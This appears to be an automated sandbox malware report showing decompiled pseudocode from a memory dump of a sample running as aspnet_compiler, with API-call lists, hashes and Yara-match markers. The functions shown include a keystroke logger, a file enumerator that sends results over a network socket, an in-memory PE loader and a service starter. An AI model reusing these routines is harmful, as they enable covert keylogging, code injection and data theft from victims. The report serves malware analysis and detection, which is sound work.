                    								_t252 = E00402EF0(_t180, _t273 - 0x54, E0041A879(_t180, _t273 - 0xb4, _t273 + 8), _t273, __eflags, 0x472ec8);
                    								E00402EF0(_t180, _t277, _t147, _t273, __eflags, _t273 - 0x9c);
                    								_push(0x66);
                    								_t149 = E00404A81(_t180 + 4, _t147, __eflags);
                    								__eflags = _t149 - 0xffffffff;
                    								_t180 = _t180 & 0xffffff00 | _t149 == 0xffffffff;
                    								E00401FB8();
                    								E00401FB8();
                    								__eflags = _t180;
                    								if(_t180 == 0) {
                    									goto L20;
                    								} else {
                    									 *((intOrPtr*)(_t273 - 0x2c)) = 4;
                    									_push(0x46ccd0);
                    									_t152 = _t273 - 0x2c;
                    									goto L3;
                    								}
                    							}
                    						} else {
                    							_t154 = E0043E224(_t273 - 0x2d8, _t273 - 0x2d8, 0x4644f0);
                    							__eflags = _t154;
                    							if(_t154 == 0) {
                    								goto L17;
                    							} else {
                    								__eflags = E0043E224(_t273 - 0x2d8, _t273 - 0x2d8, L"..");
                    								if(__eflags == 0) {
                    									goto L17;
                    								} else {
                    									_t252 = E00408876(_t180, _t273 - 0xb4, _t273 + 8, _t273, __eflags, E0040415E(_t180, _t273 - 0x54, _t252, _t273, _t273 - 0x2d8));
                    									E00402FF4(_t180, _t273 - 0x6c, _t159, _t261, _t273, __eflags, "\\");
                    									E00401EE9();
                    									E00401EE9();
                    									_t280 = _t277 - 0x18;
                    									E004086D0(_t180, _t280, _t159, __eflags, _t273 + 0x20);
                    									_t277 = _t280 - 0x18;
                    									E004086D0(_t180, _t277, _t159, __eflags, _t273 - 0x6c);
                    									_t167 = E00408D1B(_t180, _t159, __eflags);
                    									__eflags = _t167;
                    									if(_t167 != 0) {
                    										E00401EE9();
                    										goto L17;
                    									} else {
                    										 *((intOrPtr*)(_t273 - 0x28)) = 3;
                    										_push(0x46ccd0);
                    										_t152 = _t273 - 0x28;
                    										goto L3;
                    									}
                    								}
                    							}
                    						}
                    						L23:
                    						E00401FB8();
                    						E00401EE9();
                    						E00401EE9();
                    						E00401FB8();
                    						_t128 = E00401FB8();
                    						 *[fs:0x0] =  *((intOrPtr*)(_t273 - 0xc));
                    						return _t128;
                    					} else {
                    						FindClose(_t267);
                    					}
                    					L10:
                    					E00404E06(_t252);
                    					goto L23;
                    				}
                    				 *(_t273 - 4) =  *(_t273 - 4) | 0xffffffff;
                    				FindClose(_t267);
                    				_t252 = E00402F11(_t273 - 0x54, _t273 + 0x38, _t273, 0x472ec8);
                    				E00402EF0(_t180, _t277 - 0x18, _t119, _t273, __eflags, _t273 + 0x50);
                    				_push(0x67);
                    				E00404A81( *(_t273 - 0x18) + 4, _t119, __eflags);
                    				E00401FB8();
                    				goto L10;
                    			}
























                    APIs
                    • __EH_prolog.LIBCMT ref: 0040890E
                      • Part of subcall function 004048A8: connect.WS2_32(?,?,?), ref: 004048C0
                      • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                    • __CxxThrowException@8.LIBVCRUNTIME ref: 004089AA
                    • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 00408A08
                    • FindNextFileW.KERNEL32(00000000,?), ref: 00408A60
                    • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 00408A77
                      • Part of subcall function 00404E06: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051A0,?,?,?,00405139), ref: 00404E18
                      • Part of subcall function 00404E06: SetEvent.KERNEL32(?,?,?,?,00000000,?,004051A0,?,?,?,00405139), ref: 00404E23
                      • Part of subcall function 00404E06: CloseHandle.KERNEL32(?,?,?,?,00000000,?,004051A0,?,?,?,00405139), ref: 00404E2C
                    • FindClose.KERNEL32(00000000), ref: 00408C6F
                      • Part of subcall function 00404A81: WaitForSingleObject.KERNEL32(?,00000000,0040545D,?,?,00000004,?,?,00000004,?,00472EE0,?), ref: 00404B27
                      • Part of subcall function 00404A81: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,?,00472EE0,?,?,?,?,?,?,0040545D), ref: 00404B55
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: Find$Close$EventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsend
                    • String ID:
                    • API String ID: 1824512719-0
                    • Opcode ID: 37be2e0fa6e91f9a51b205309b85f8c57a9833f0dd293f7601e131ad217d934b
                    • Instruction ID: d8a72a11d5b22176fcc9823f728123f790ce651a5e6d51f59b88b1622e7f2630
                    • Opcode Fuzzy Hash: 37be2e0fa6e91f9a51b205309b85f8c57a9833f0dd293f7601e131ad217d934b
                    • Instruction Fuzzy Hash: F1B17D729001099BCB14FBA1DD96AEDB378AF40318F50417FF506B61D2EF386A49CB99
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 86%
                    			E00411241(intOrPtr* __ecx, intOrPtr __edx, void* __eflags) {
                    				signed int _t52;
                    				signed int _t55;
                    				void* _t58;
                    				signed int _t66;
                    				signed int _t68;
                    				void* _t73;
                    				signed int _t74;
                    				void* _t75;
                    				signed int _t77;
                    				signed int _t78;
                    				signed int _t80;
                    				signed int _t81;
                    				signed int _t82;
                    				void* _t86;
                    				signed int _t87;
                    				intOrPtr* _t90;
                    				signed int _t104;
                    				void* _t106;
                    				signed int _t109;
                    				void* _t115;
                    				void* _t116;
                    				signed int _t117;
                    				signed int _t119;
                    				void* _t121;
                    				signed int _t123;
                    				signed int _t126;
                    				void* _t127;
                    				void* _t128;
                    
                    				_t106 = 0x40;
                    				 *((intOrPtr*)(_t127 + 0x10)) = __edx;
                    				 *((intOrPtr*)(_t127 + 0xc)) = __ecx;
                    				_t119 = 0;
                    				if(E00410CDF(__edx, _t106) != 0) {
                    					__eflags =  *__ecx - 0x5a4d;
                    					if( *__ecx == 0x5a4d) {
                    						_t52 = E00410CDF(__edx,  *((intOrPtr*)(__ecx + 0x3c)) + 0xf8);
                    						__eflags = _t52;
                    						if(_t52 == 0) {
                    							goto L1;
                    						}
                    						_t90 =  *((intOrPtr*)(__ecx + 0x3c)) + __ecx;
                    						__eflags =  *_t90 - 0x4550;
                    						if( *_t90 != 0x4550) {
                    							goto L3;
                    						}
                    						__eflags =  *((intOrPtr*)(_t90 + 4)) - 0x14c;
                    						if( *((intOrPtr*)(_t90 + 4)) != 0x14c) {
                    							goto L3;
                    						}
                    						__eflags =  *(_t90 + 0x38) & 0x00000001;
                    						if(( *(_t90 + 0x38) & 0x00000001) != 0) {
                    							goto L3;
                    						}
                    						_t109 =  *(_t90 + 6) & 0x0000ffff;
                    						_t55 =  *(_t90 + 0x14) & 0x0000ffff;
                    						__eflags = _t109;
                    						if(_t109 == 0) {
                    							L14:
                    							__imp__GetNativeSystemInfo(_t127 + 0x18, _t115);
                    							_t116 = E00410CCE( *((intOrPtr*)(_t90 + 0x50)),  *((intOrPtr*)(_t127 + 0x1c)));
                    							_t58 = E00410CCE(_t119,  *((intOrPtr*)(_t127 + 0x1c)));
                    							__eflags = _t116 - _t58;
                    							if(_t116 == _t58) {
                    								_push(0);
                    								_t126 = E004111E6( *((intOrPtr*)(_t90 + 0x34)), _t116, 0x3000, 0x40);
                    								_t128 = _t127 + 0x14;
                    								__eflags = _t126;
                    								if(_t126 != 0) {
                    									L20:
                    									_t117 = HeapAlloc(GetProcessHeap(), 8, 0x40);
                    									__eflags = _t117;
                    									if(_t117 != 0) {
                    										 *(_t117 + 4) = _t126;
                    										 *((intOrPtr*)(_t117 + 0x1c)) = E004111E6;
                    										 *(_t117 + 0x14) = ( *(_t90 + 0x16) & 0x0000ffff) >> 0x0000000d & 0x00000001;
                    										 *((intOrPtr*)(_t117 + 0x20)) = E004111FD;
                    										 *((intOrPtr*)(_t117 + 0x24)) = E00411210;
                    										 *((intOrPtr*)(_t117 + 0x28)) = E0041121B;
                    										 *((intOrPtr*)(_t117 + 0x2c)) = E0041122A;
                    										 *((intOrPtr*)(_t117 + 0x34)) = 0;
                    										 *((intOrPtr*)(_t117 + 0x3c)) =  *((intOrPtr*)(_t128 + 0x1c));
                    										_t66 = E00410CDF( *((intOrPtr*)(_t128 + 0x14)),  *((intOrPtr*)(_t90 + 0x54)));
                    										__eflags = _t66;
                    										if(_t66 == 0) {
                    											L34:
                    											E004115BA(_t117);
                    											L35:
                    											_t68 = 0;
                    											__eflags = 0;
                    											L36:
                    											return _t68;
                    										}
                    										_push(0);
                    										_t121 = E004111E6(_t126,  *((intOrPtr*)(_t90 + 0x54)), 0x1000, 4);
                    										E004351E0(_t121,  *((intOrPtr*)(_t128 + 0x28)),  *((intOrPtr*)(_t90 + 0x54)));
                    										_t73 =  *((intOrPtr*)( *((intOrPtr*)(_t128 + 0x30)) + 0x3c)) + _t121;
                    										 *_t117 = _t73;
                    										 *(_t73 + 0x34) = _t126;
                    										_t74 = E00410CF2( *((intOrPtr*)(_t128 + 0x34)), _t90, _t117);
                    										__eflags = _t74;
                    										if(_t74 == 0) {
                    											goto L34;
                    										}
                    										_t75 =  *_t117;
                    										_t114 =  *((intOrPtr*)(_t75 + 0x34)) ==  *((intOrPtr*)(_t90 + 0x34));
                    										__eflags =  *((intOrPtr*)(_t75 + 0x34)) ==  *((intOrPtr*)(_t90 + 0x34));
                    										if( *((intOrPtr*)(_t75 + 0x34)) ==  *((intOrPtr*)(_t90 + 0x34))) {
                    											_t123 = 1;
                    											__eflags = 1;
                    											 *((intOrPtr*)(_t117 + 0x18)) = 1;
                    										} else {
                    											 *((intOrPtr*)(_t117 + 0x18)) = E00410FF6(_t114);
                    											_t123 = 1;
                    										}
                    										__eflags = E004110A2(_t117);
                    										if(__eflags != 0) {
                    											_t77 = E00410E92(_t117, __eflags);
                    											__eflags = _t77;
                    											if(_t77 == 0) {
                    												goto L34;
                    											}
                    											_t78 = E00410FC5(_t117);
                    											__eflags = _t78;
                    											if(_t78 == 0) {
                    												goto L34;
                    											}
                    											_t80 =  *( *_t117 + 0x28);
                    											__eflags = _t80;
                    											if(_t80 == 0) {
                    												_t48 = _t117 + 0x38;
                    												 *_t48 =  *(_t117 + 0x38) & 0x00000000;
                    												__eflags =  *_t48;
                    												L41:
                    												_t68 = _t117;
                    												goto L36;
                    											}
                    											_t81 = _t80 + _t126;
                    											__eflags =  *(_t117 + 0x14);
                    											if( *(_t117 + 0x14) == 0) {
                    												 *(_t117 + 0x38) = _t81;
                    												goto L41;
                    											}
                    											_t82 =  *_t81(_t126, _t123, 0);
                    											__eflags = _t82;
                    											if(_t82 != 0) {
                    												 *((intOrPtr*)(_t117 + 0x10)) = _t123;
                    												goto L41;
                    											}
                    											SetLastError(0x45a);
                    										}
                    										goto L34;
                    									}
                    									_push(0);
                    									E004111FD(_t126, 0, 0x8000);
                    									L19:
                    									SetLastError(0xe);
                    									L16:
                    									goto L35;
                    								}
                    								_push(0);
                    								_t126 = E004111E6(0, _t116, 0x3000, 0x40);
                    								_t128 = _t128 + 0x14;
                    								__eflags = _t126;
                    								if(_t126 != 0) {
                    									goto L20;
                    								}
                    								goto L19;
                    							}
                    							SetLastError(0xc1);
                    							goto L16;
                    						}
                    						_t104 = _t90 + 0x24 + _t55;
                    						__eflags = _t104;
                    						do {
                    							__eflags =  *(_t104 + 4);
                    							_t86 =  *_t104;
                    							if( *(_t104 + 4) != 0) {
                    								_t87 = _t86 +  *(_t104 + 4);
                    								__eflags = _t87;
                    							} else {
                    								_t87 = _t86 +  *(_t90 + 0x38);
                    							}
                    							__eflags = _t87 - _t119;
                    							_t119 = _t87 > _t119 ? _t87 : _t119;
                    							_t104 = _t104 + 0x28;
                    							_t109 = _t109 - 1;
                    							__eflags = _t109;
                    						} while (_t109 != 0);
                    						goto L14;
                    					}
                    					L3:
                    					SetLastError(0xc1);
                    				}
                    				L1:
                    				return 0;
                    			}

                    APIs
                      • Part of subcall function 00410CDF: SetLastError.KERNEL32(0000000D,0041125F,00000000,?,?,?,?,?,?,?,?,?,?,?,?,0041123D), ref: 00410CE5
                    • SetLastError.KERNEL32(000000C1,00000000,?,?,?,?,?,?,?,?,?,?,?,?,0041123D), ref: 0041127A
                    • GetNativeSystemInfo.KERNEL32(?,00409AFF,00000000,?,?,?,?,?,?,?,?,?,?,?,?,0041123D), ref: 004112E8
                    • SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,?), ref: 0041130C
                      • Part of subcall function 004111E6: VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,0041132A,?,00000000,00003000,00000040,00000000,?,?), ref: 004111F6
                    • GetProcessHeap.KERNEL32(00000008,00000040,?,?,?,?,?), ref: 00411353
                    • HeapAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 0041135A
                    • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041146D
                      • Part of subcall function 004115BA: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,0041147A,?,?,?,?,?), ref: 0041162A
                      • Part of subcall function 004115BA: HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 00411631
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
                    • String ID:
                    • API String ID: 3950776272-0
                    • Opcode ID: bd525cc1913b0ea8265babaacec09d0fcbdf2b7538008eea0c1f98325fc720c9
                    • Instruction ID: 0cb4cb50e04e4c00dda63c2048a6518c68fbc69f33767e983cf50f1e9feca01c
                    • Opcode Fuzzy Hash: bd525cc1913b0ea8265babaacec09d0fcbdf2b7538008eea0c1f98325fc720c9
                    • Instruction Fuzzy Hash: 7F61D470605201ABD7109F66CD81BAB7BA5BF44740F04416AFE05977A2EBBCD8C1CBD9
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 89%
                    			E004099E3(void* __ecx, intOrPtr _a4) {
                    				long _v8;
                    				void _v38;
                    				short _v40;
                    				char _v296;
                    				void* __ebx;
                    				void* __edi;
                    				void* __ebp;
                    				struct HKL__* _t20;
                    				void* _t30;
                    				signed int _t32;
                    				void* _t36;
                    				void* _t37;
                    				void* _t41;
                    
                    				_t30 = __ecx;
                    				E00435760(_t37,  &_v296, 0, 0x100);
                    				_v40 = 0;
                    				_t32 = 7;
                    				memset( &_v38, 0, _t32 << 2);
                    				asm("stosw");
                    				_t20 = GetKeyboardLayout(GetWindowThreadProcessId(GetForegroundWindow(),  &_v8));
                    				GetKeyState(0x10);
                    				GetKeyboardState( &_v296);
                    				ToUnicodeEx( *(_t30 + 0x4c),  *(_t30 + 0x50),  &_v296,  &_v40, 0x10, 0, _t20);
                    				E0040415E(_t30, _a4, _t36, _t41,  &_v40);
                    				return _a4;
                    			}

                    APIs
                    • GetForegroundWindow.USER32(00000000,?,00000000), ref: 00409A17
                    • GetWindowThreadProcessId.USER32(00000000,?), ref: 00409A22
                    • GetKeyboardLayout.USER32 ref: 00409A29
                    • GetKeyState.USER32(00000010), ref: 00409A33
                    • GetKeyboardState.USER32(?), ref: 00409A40
                    • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00409A5C
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: KeyboardStateWindow$ForegroundLayoutProcessThreadUnicode
                    • String ID:
                    • API String ID: 3566172867-0
                    • Opcode ID: 335d353787f1a1441ab9bf81f1485f4031705ba2e58d60c419ec6f48bb68709f
                    • Instruction ID: aeedf37edc6dd1a703413de17d62dd48ee8b6b0f748b25ac56bea9041ac92ee6
                    • Opcode Fuzzy Hash: 335d353787f1a1441ab9bf81f1485f4031705ba2e58d60c419ec6f48bb68709f
                    • Instruction Fuzzy Hash: 35110C7290020CABDB109BA4ED49FDA77ACEB0C316F1004B5FE05E6191E675AA54DBA4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E004195A5(char _a4) {
                    				signed int _t14;
                    				void* _t17;
                    				void* _t18;
                    
                    				_t14 = 0;
                    				_t18 = OpenSCManagerW(0, 0, 0x10);
                    				_t17 = OpenServiceW(_t18, E00401EE4( &_a4), 0x10);
                    				if(_t17 != 0) {
                    					_t14 = 0 | StartServiceW(_t17, 0, 0) != 0x00000000;
                    					CloseServiceHandle(_t18);
                    					CloseServiceHandle(_t17);
                    				} else {
                    					CloseServiceHandle(_t18);
                    				}
                    				E00401EE9();
                    				return _t14;
                    			}

                    APIs
                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,004191FB,00000000), ref: 004195AE
                    • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,004191FB,00000000), ref: 004195C3
                    • CloseServiceHandle.ADVAPI32(00000000,?,004191FB,00000000), ref: 004195D0
                    • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,004191FB,00000000), ref: 004195DB
                    • CloseServiceHandle.ADVAPI32(00000000,?,004191FB,00000000), ref: 004195ED
                    • CloseServiceHandle.ADVAPI32(00000000,?,004191FB,00000000), ref: 004195F0
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: Service$CloseHandle$Open$ManagerStart
                    • String ID:
                    • API String ID: 276877138-0
                    • Opcode ID: a350a4912117bdb20476acd08089d57fbfd71a973df2ad4d6386a0f0e30e5d6f
                    • Instruction ID: 9846d5d3bfd465166b522490e3d014472adb2eb81bdb42509a6f537d7eac31bb
                    • Opcode Fuzzy Hash: a350a4912117bdb20476acd08089d57fbfd71a973df2ad4d6386a0f0e30e5d6f
                    • Instruction Fuzzy Hash: 43F0E9721052247FD2119F20BCC8DFF27ECDF81BA6B00043AF501921D18F68CD45A5B5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 68%
                    			E00450558(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, intOrPtr _a4, signed short* _a8, char _a12) {
                    				intOrPtr* _v8;
                    				short _v12;
                    				signed int _v32;
                    				intOrPtr _v40;
                    				signed int _v52;
                    				char _v272;
                    				short _v292;
                    				void* __ebp;
                    				void* _t34;
                    				short* _t35;
                    				intOrPtr* _t36;
                    				signed int _t39;
                    				signed short* _t44;
                    				intOrPtr _t47;
                    				void* _t49;
                    				signed int _t52;
                    				signed int _t58;
                    				signed int _t60;
                    				signed int _t66;
                    				void* _t68;
                    				void* _t71;
                    				void* _t76;
                    				void* _t80;
                    				intOrPtr _t87;
                    				short* _t89;
                    				void* _t90;
                    				void* _t92;
                    				short _t94;
                    				void* _t95;
                    				intOrPtr* _t98;
                    				void* _t112;
                    				void* _t116;
                    				intOrPtr* _t118;
                    				intOrPtr _t121;
                    				signed int* _t122;
                    				intOrPtr* _t125;
                    				signed short _t127;
                    				int _t129;
                    				signed int _t132;
                    				void* _t133;
                    				signed int _t134;
                    
                    				_t115 = __edx;
                    				_push(__ecx);
                    				_push(__ecx);
                    				_push(__ebx);
                    				_push(__esi);
                    				_push(__edi);
                    				_t34 = E00446A95(__ebx, __ecx, __edx);
                    				_t87 = _a4;
                    				_t94 = 0;
                    				_v12 = 0;
                    				_t3 = _t34 + 0x50; // 0x50
                    				_t125 = _t3;
                    				_t4 = _t125 + 0x250; // 0x2a0
                    				_t35 = _t4;
                    				 *((intOrPtr*)(_t125 + 8)) = 0;
                    				 *_t35 = 0;
                    				_t6 = _t125 + 4; // 0x54
                    				_t118 = _t6;
                    				_v8 = _t35;
                    				_t36 = _t87 + 0x80;
                    				 *_t125 = _t87;
                    				 *_t118 = _t36;
                    				if( *_t36 != 0) {
                    					E004504E9(0x45e200, 0x16, _t118);
                    					_t133 = _t133 + 0xc;
                    					_t94 = 0;
                    				}
                    				_push(_t125);
                    				if( *((intOrPtr*)( *_t125)) == _t94) {
                    					E0044FE5A(_t87, _t94, _t115, _t118, __eflags);
                    					goto L12;
                    				} else {
                    					if( *((intOrPtr*)( *_t118)) == _t94) {
                    						E0044FF7D();
                    					} else {
                    						E0044FEE3(_t94);
                    					}
                    					_pop(_t95);
                    					if( *((intOrPtr*)(_t125 + 8)) == 0) {
                    						_t80 = E004504E9(0x45def0, 0x40, _t125);
                    						_t133 = _t133 + 0xc;
                    						if(_t80 != 0) {
                    							_push(_t125);
                    							if( *((intOrPtr*)( *_t118)) == 0) {
                    								E0044FF7D();
                    							} else {
                    								E0044FEE3(0);
                    							}
                    							L12:
                    							_pop(_t95);
                    						}
                    					}
                    				}
                    				if( *((intOrPtr*)(_t125 + 8)) == 0) {
                    					L31:
                    					_t39 = 0;
                    					__eflags = 0;
                    					goto L32;
                    				} else {
                    					_t127 = E004503B7(_t95, _t87 + 0x100, _t125);
                    					if(_t127 == 0 || _t127 == 0xfde8 || _t127 == 0xfde9 || IsValidCodePage(_t127 & 0x0000ffff) == 0) {
                    						goto L31;
                    					} else {
                    						_t44 = _a8;
                    						if(_t44 != 0) {
                    							 *_t44 = _t127;
                    						}
                    						_t13 =  &_a12; // 0x443374
                    						_t121 =  *_t13;
                    						if(_t121 == 0) {
                    							L30:
                    							_t39 = 1;
                    							goto L32;
                    						} else {
                    							_t98 = _v8;
                    							_t89 = _t121 + 0x120;
                    							 *_t89 = 0;
                    							_t116 = _t98 + 2;
                    							do {
                    								_t47 =  *_t98;
                    								_t98 = _t98 + 2;
                    							} while (_t47 != _v12);
                    							_t100 = _t98 - _t116 >> 1;
                    							_push((_t98 - _t116 >> 1) + 1);
                    							_t49 = E0044E949(_t98 - _t116 >> 1, _t89, 0x55, _v8);
                    							_t134 = _t133 + 0x10;
                    							_t153 = _t49;
                    							if(_t49 != 0) {
                    								_push(0);
                    								_push(0);
                    								_push(0);
                    								_push(0);
                    								_push(0);
                    								E0043A5E8();
                    								asm("int3");
                    								_t132 = _t134;
                    								_t52 =  *0x46f00c; // 0x54ba778e
                    								_v52 = _t52 ^ _t132;
                    								_push(_t89);
                    								_push(_t127);
                    								_push(_t121);
                    								_t90 = E00446A95(_t89, _t100, _t116);
                    								_t122 =  *(E00446A95(_t90, _t100, _t116) + 0x34c);
                    								_t129 = E00450C6B(_v40);
                    								asm("sbb ecx, ecx");
                    								_t58 = GetLocaleInfoW(_t129, ( ~( *(_t90 + 0x64)) & 0xfffff005) + 0x1002,  &_v292, 0x78);
                    								__eflags = _t58;
                    								if(_t58 != 0) {
                    									_t60 = E00452294(_t90, _t122, _t129,  *((intOrPtr*)(_t90 + 0x54)),  &_v272);
                    									__eflags = _t60;
                    									if(_t60 == 0) {
                    										_t66 = E00450D9F(_t129);
                    										__eflags = _t66;
                    										if(_t66 != 0) {
                    											 *_t122 =  *_t122 | 0x00000004;
                    											__eflags =  *_t122;
                    											_t122[2] = _t129;
                    											_t122[1] = _t129;
                    										}
                    									}
                    									__eflags =  !( *_t122 >> 2) & 0x00000001;
                    								} else {
                    									 *_t122 =  *_t122 & _t58;
                    								}
                    								__eflags = _v32 ^ _t132;
                    								return E004338BB(_v32 ^ _t132);
                    							} else {
                    								_t68 = E0044716D(_t100, _t127, _t153, _t89, 0x1001, _t121, 0x40);
                    								_t154 = _t68;
                    								if(_t68 == 0) {
                    									goto L31;
                    								} else {
                    									_t92 = _t121 + 0x80;
                    									if(E0044716D(_t100, _t127, _t154, _t121 + 0x120, 0x1002, _t92, 0x40) == 0) {
                    										goto L31;
                    									} else {
                    										_push(0x5f);
                    										_t71 = E00456277(_t100);
                    										_t112 = _t92;
                    										if(_t71 != 0) {
                    											L28:
                    											if(E0044716D(_t112, _t127, _t157, _t121 + 0x120, 7, _t92, 0x40) == 0) {
                    												goto L31;
                    											} else {
                    												goto L29;
                    											}
                    										} else {
                    											_push(0x2e);
                    											_t76 = E00456277(_t112);
                    											_t112 = _t92;
                    											_t157 = _t76;
                    											if(_t76 == 0) {
                    												L29:
                    												E004407BF(_t112, _t127, _t121 + 0x100, 0x10, 0xa);
                    												goto L30;
                    											} else {
                    												goto L28;
                    											}
                    										}
                    									}
                    								}
                    								L32:
                    								return _t39;
                    							}
                    						}
                    					}
                    				}
                    			}

                    APIs
                      • Part of subcall function 00446A95: GetLastError.KERNEL32(00000020,?,004390F5,?,?,?,0043E278,?,?,00000020,00000000,?,?,?,0042C60C,0000003B), ref: 00446A99
                      • Part of subcall function 00446A95: _free.LIBCMT ref: 00446ACC
                      • Part of subcall function 00446A95: SetLastError.KERNEL32(00000000,0043E278,?,?,00000020,00000000,?,?,?,0042C60C,0000003B,?,00000041,00000000,00000000), ref: 00446B0D
                      • Part of subcall function 00446A95: _abort.LIBCMT ref: 00446B13
                    • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00443374,?,?,?,?,00442DCB,?,00000004), ref: 0045063A
                    • _wcschr.LIBVCRUNTIME ref: 004506CA
                    • _wcschr.LIBVCRUNTIME ref: 004506D8
                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,t3D,00000000,?), ref: 0045077B
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                    • String ID: t3D
                    • API String ID: 4212172061-694417703
                    • Opcode ID: b9c9552eaca3d1881d3ae1f5d8ad23bd1f562e179b5fb4d1a587ec592402c2be
                    • Instruction ID: ba7a9897b5b485b0d00a1d7db932209b8575a85ef4c726eb57bec7d4989f050b
                    • Opcode Fuzzy Hash: b9c9552eaca3d1881d3ae1f5d8ad23bd1f562e179b5fb4d1a587ec592402c2be
                    • Instruction Fuzzy Hash: 59610B75500706AAE724AB75CC42A6B73A8EF09705F14046FFD05DB282FB78ED488B69
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 94%
                    			E00450CBC(void* __ecx, signed int _a4, intOrPtr _a8) {
                    				short _v8;
                    				short _t17;
                    				signed int _t18;
                    				signed int _t23;
                    				signed int _t25;
                    				signed int _t26;
                    				signed int _t27;
                    				void* _t30;
                    				void* _t31;
                    				intOrPtr _t32;
                    				intOrPtr _t33;
                    				intOrPtr* _t36;
                    				intOrPtr* _t37;
                    
                    				_push(__ecx);
                    				_t23 = _a4;
                    				if(_t23 == 0) {
                    					L21:
                    					_t12 = _a8 + 8; // 0xfde8fe81
                    					if(GetLocaleInfoW( *_t12, 0x20001004,  &_v8, 2) != 0) {
                    						_t17 = _v8;
                    						if(_t17 == 0) {
                    							_t17 = GetACP();
                    						}
                    						L25:
                    						return _t17;
                    					}
                    					L22:
                    					_t17 = 0;
                    					goto L25;
                    				}
                    				_t18 = 0;
                    				if( *_t23 == 0) {
                    					goto L21;
                    				}
                    				_t36 = 0x45e318;
                    				_t25 = _t23;
                    				while(1) {
                    					_t30 =  *_t25;
                    					if(_t30 !=  *_t36) {
                    						break;
                    					}
                    					if(_t30 == 0) {
                    						L7:
                    						_t26 = _t18;
                    						L9:
                    						if(_t26 == 0) {
                    							goto L21;
                    						}
                    						_t37 = 0x45e320;
                    						_t27 = _t23;
                    						while(1) {
                    							_t31 =  *_t27;
                    							if(_t31 !=  *_t37) {
                    								break;
                    							}
                    							if(_t31 == 0) {
                    								L17:
                    								if(_t18 != 0) {
                    									_t17 = E0043A382(_t23, _t23);
                    									goto L25;
                    								}
                    								_t8 = _a8 + 8; // 0xfde8fe81
                    								if(GetLocaleInfoW( *_t8, 0x2000000b,  &_v8, 2) == 0) {
                    									goto L22;
                    								}
                    								_t17 = _v8;
                    								goto L25;
                    							}
                    							_t32 =  *((intOrPtr*)(_t27 + 2));
                    							if(_t32 !=  *((intOrPtr*)(_t37 + 2))) {
                    								break;
                    							}
                    							_t27 = _t27 + 4;
                    							_t37 = _t37 + 4;
                    							if(_t32 != 0) {
                    								continue;
                    							}
                    							goto L17;
                    						}
                    						asm("sbb eax, eax");
                    						_t18 = _t18 | 0x00000001;
                    						goto L17;
                    					}
                    					_t33 =  *((intOrPtr*)(_t25 + 2));
                    					if(_t33 !=  *((intOrPtr*)(_t36 + 2))) {
                    						break;
                    					}
                    					_t25 = _t25 + 4;
                    					_t36 = _t36 + 4;
                    					if(_t33 != 0) {
                    						continue;
                    					}
                    					goto L7;
                    				}
                    				asm("sbb edx, edx");
                    				_t26 = _t25 | 0x00000001;
                    				goto L9;
                    			}

                    APIs
                    • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,00450FDB,?,00000000), ref: 00450D55
                    • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,00450FDB,?,00000000), ref: 00450D7E
                    • GetACP.KERNEL32(?,?,00450FDB,?,00000000), ref: 00450D93
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
